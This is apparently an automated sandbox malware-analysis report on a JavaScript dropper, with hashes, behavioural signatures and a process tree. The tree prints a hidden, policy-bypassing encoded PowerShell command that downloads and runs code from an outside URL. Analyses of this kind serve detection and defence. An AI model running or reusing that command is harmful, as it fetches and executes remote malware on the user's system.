Analysis
-
max time kernel
120s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
30/12/2023, 23:31
Static task
static1
Behavioral task
behavioral1
Sample
2013199250496646fc9ba35f6011bbb3.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
2013199250496646fc9ba35f6011bbb3.js
Resource
win10v2004-20231215-en
General
-
Target
2013199250496646fc9ba35f6011bbb3.js
-
Size
71KB
-
MD5
2013199250496646fc9ba35f6011bbb3
-
SHA1
1dc1694a9cd6276247731e12d1a2418ff53246eb
-
SHA256
c812e3ce32f48e6ebd91f76e6103e2a6cbf71dcb9efce8c8ccc2e694aefcce6c
-
SHA512
e7874ff0e05725c93b968eaaaef2fca77eadb45c2165a788635883aa00c44c58f38dd41cf81dead1bd8361ad08b24840f17e16b73508d9bbc8c90e4fd9032e59
-
SSDEEP
1536:zh8snT1skKU9Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/Q:18snT1sDU9Ry98guHVBqqg2bcruzUHm2
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2828 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2828 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2828 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1756 wrote to memory of 2124 1756 wscript.exe 28 PID 1756 wrote to memory of 2124 1756 wscript.exe 28 PID 1756 wrote to memory of 2124 1756 wscript.exe 28 PID 2124 wrote to memory of 2828 2124 cmd.exe 29 PID 2124 wrote to memory of 2828 2124 cmd.exe 29 PID 2124 wrote to memory of 2828 2124 cmd.exe 29
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2013199250496646fc9ba35f6011bbb3.js1⤵
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-